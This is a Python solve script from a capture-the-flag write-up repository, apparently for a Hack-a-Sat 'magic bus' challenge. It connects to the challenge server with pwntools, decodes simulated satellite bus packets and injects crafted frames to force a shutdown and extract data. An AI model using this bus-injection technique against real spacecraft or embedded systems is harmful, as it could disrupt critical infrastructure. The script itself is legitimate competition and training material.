10
2
Fork 0
has-writeup/satellite-bus/magic-bus/magic-bus.py

97 lines
2.5 KiB
Python
Raw Normal View History

2020-05-26 05:28:27 +00:00
#!/usr/bin/env python3
import time
import sys
from pwnlib import tubes
TICKET = 'THE_TICKET'
2020-05-26 05:28:27 +00:00
r = tubes.remote.remote('bus.satellitesabove.me', 5041)
r.send(TICKET+'\n')
time.sleep(0.5)
r.recvuntil('Ticket please:\n', drop=True)
def to_hex(b):
return ':'.join(hex(x)[2:] for x in b)
def decode_pkt(b):
if len(b) == 0:
return
if b[0] == 0xCA:
pass # raw data?
elif b[0] == ord(':'):
if b[3] == ord('>') or b[3] == ord('?'): # > or ?
field1 = to_hex(b[7:13]) # 6 bytes
field1end = chr(b[13]) #
field2 = to_hex(b[15:22]) # 7 bytes
if b[22] != ord('@'):
print('b[22] should be @ but is {}'.format(chr(b[22])))
field3 = to_hex(b[23:25])
field3end = chr(b[25])
c1 = b[26]
field4 = to_hex(b[27:30])
if b[30] != ord('?'):
print('b[30] is not ?')
print(': 00:00:00 > {} {} {} @ {} {} {} ?'.format(field1, field1end, field2,
field3, field3end, field4))
2020-05-26 05:28:27 +00:00
elif b[0] == ord(';'):
print('delimiter') # end of previous packet?
else:
print(b[0])
print('unknown data')
print('\n')
start = True
inj = b"^3b+00+00+37+."
inj2 = b"^ca+" + (b"00+" * 512) + b"."
2020-05-26 05:28:27 +00:00
dont = False
inj2_b = False
print("Injection: " + inj.decode("utf-8"))
while True:
r.recvuntil('^')
raw = r.recvuntil('.')
rawn = bytes([94]) + raw
print(rawn)
v = raw.decode().split('+')
del v[-1]
h = bytes([int(i, 16) for i in v])
if h == b';\x00\x00?':
print("ONCE CALL")
elif h == b';\x00\x00>':
print("END CALL")
elif h.startswith(b':\x00\x00?'):
print(f"ONCE: {h[4:].hex()}")
elif h.startswith(b'\x3b\x00\x00\x37'):
print("SHUT DOWN SUCCESSFUL")
dont = True
inj2_b = True
print("INJECTING AGAIN")
r.send(inj2)
elif h.startswith(b':\x00\x00>'):
# notable delay between start and end each time
if start:
print(f"START: {h[4:].hex()}")
start = False
elif inj2_b == False:
print("INJECTING")
r.send(inj)
print(f"END: {h[4:].hex()}")
start = True
else:
print("INJECTING AGAIN")
r.send(inj2)
print(f"END: {h[4:].hex()}")
start = True
elif h.startswith(b'\xca'):
print(f"JUICE: {h}")
else:
dont = True
print(f"???: {h.hex()}")
if not dont:
decode_pkt(h)
dont = False
sys.stdout.flush()